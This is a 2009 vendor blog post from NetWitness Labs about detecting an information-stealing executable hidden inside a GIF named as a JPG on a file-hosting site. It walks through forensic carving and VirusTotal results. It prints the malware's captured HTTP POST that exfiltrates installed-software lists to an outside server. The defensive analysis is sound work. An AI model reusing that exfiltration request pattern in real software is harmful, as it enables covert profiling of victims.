The Power of Realtime Network Forensics – Advanced Malware Detection

November 27, 2009 Network Visbility, network forensics No Comments

Hey gang…Alex here…writing from the NetWitness Labs…

At NetWitness, our focus is on providing analytics, and we are constantly looking at new ways to apply our unique analytics to the realm of content development.  We know that we have really cool technology and want to showcase that as well as push the envelope of what is possible in this space.   If you’ve seen the recent rule update on the freeware welcome page you are seeing the results of these efforts first hand.

If you’ve been following the threat landscape for the past few years, you will know without question that malware is a key part of both cybercrimal and nation-state hacking activity.   You also know that current security technologies are woefully inadequate in detecting targeted and obfuscated malware.  Keeping a network secure requires knowledge of normalcy on your network as well a cutting edge technology to quickly make you aware of deviations from this normalcy.

Part of this concept is using knowledge of what’s “normal” to define what’s “abnormal”.   In this example I’ll use windows executables.  We know from common IT knowledge that windows executables often end with an “.exe” extension (among others).   Those with a forensic background also know that Windows executables are forensically identifiable by looking for a file signature that includes common “tells”.   An example of this is the PE file header,  commonly refereed to as “MZ”.

If I take these existing bits of knowledge and combine them, I have the basis for a detection of “abnormal” executables as follows:

“If forensic signature equals windows executable,  but the file extension doesn’t equal a known executable extension, let me know about it!”

With this concept in mind, one of my extremely talented coworkers (Gary Golomb), put together a flex parser with the sole purpose of detecting file signatures on the wire.   Think of a forensic analysis of filetypes using a dedicated host forensic tool like Encase or Forensic Tool Kit, but on the network and in real-time.   We’ve been testing this parser in various scenarios as warranted, and recently made an interesting discovery while at a client site.

During this engagement, we began investigating hits on our “file signature windows executable” parser, which is designed to generate “alert” metadata in the NetWitness framework when it detects forensic executable tells.

Alert Rule Hit!

Meet 343njpl.jpg:

One of the files that triggered this alert was the following file, which was downloaded from the “tinypic.com” file hosting service and was named 343njpl.jpg:

Hidden File

When I look at this file forensically,  I see an interesting inconsistency.   The file header identifies the file as a GIF, not a JPG.  Something is amiss!

Not a JPG at all!

Digging further…I see that there is, in fact, an executable file header buried in the file:

Exe Header

What’s interesting to note here, is that this file renders as a GIF correctly in a web browser, so if you were to wander across it during an investigation, it would not be readily apparent that it is hiding an executable.

With this new knowledge,  We then submitted the file to virustotal to determine if it is known malicious.   The results were not promising, with 3 detections out of 41:

http://www.virustotal.com/analisis/073a4210835e026712e5aa08e18004eabe9c8c4dc7b4565db47a34e38b565b8b-1258144380

At this point we really wanted to dig deeper and figure out what this file is trying to do,  so we opened the file in a hex editor and carved the EXE out of the file, then resubmitted to virustotal…results were much better this time, but still only about 65% with 27 out of 41 detections.

http://www.virustotal.com/analisis/0ccfe86dc2ab9cd8b9f589bae6666c903af8de2ee2bfcce4dc8464346b4e761a-1256743615

Ok…so we know that this file is indeed malicous now.  So what does it actually do?    If we use some malware analysis techniques, we discover that this initially reports installed applications to a webserver in the netherlands:

POST /65/logpl.php HTTP/1.1
Referer: http://google.com/
Content-Type: application/x-www-form-urlencoded
User-Agent: hello
Host: www2.sexown.com
Content-Length: 692
Cache-Control: no-cache

pl=plV:1.1|Adobe_Flash_Player_10_ActiveXV:10.0.22.87|Explorer_Suite_III|IDA_Pro_D
emo_v5.4|InstallWatch_Pro_2.5|Malcode_Analyst_Pack_v0.21|Microsoft_.NET_Framework
_3.5_SP1|Mozilla_Firefox_(3.5)V:3.5 (en-US)|Notepad++V:5.4.4|Paros_3.2.13|Windows
_XP_Service_Pack_3V:20080414.031525|WinPcap_4.1_beta5V:4.1.0.1452|Wireshark_1.2.0
V:1.2.0|Mandiant_Red_CurtainV:1.0.0|Python_2.6.2V:2.6.2150|Java(TM)_6_Update_14V:
6.0.140|WebFldrs_XPV:9.50.7523|Mandiant_Web_HistorianV:1.3.0|Mandiant_Highlighter
V:1.1.1|MemoryzeV:1.3.1000|Microsoft_.NET_Framework_3.0_Service_Pack_2V:3.2.30729
|Microsoft_.NET_Framework_2.0_Service_Pack_2V:2.2.30729|Microsoft_.NET_Framework_
3.5_SP1V:3.5.30729|VMware_ToolsV:7.9.6.5197|

So let’s review the facts:

- A file that strays from the expected norm is detected by NetWitness technology, being served from a common file hosting site.

- This file properly renders as a GIF in a web browser, but contains an embedded executable.

- Malware detection on this sample in its embedded form is dismal, but gets better when the executable is extracted from the GIF.

- Using behavioral analysis, we can determine that the attached executable is an information stealer, at the very least.

Tied to an alerting mechanism in Netwitness Informer, we could have this alert sent directly to an enterprise SOC for response, informing them of unusual executable behavior, without having to rely on signature-based malware controls!

NetWitness….letting you see your network like never before.   :)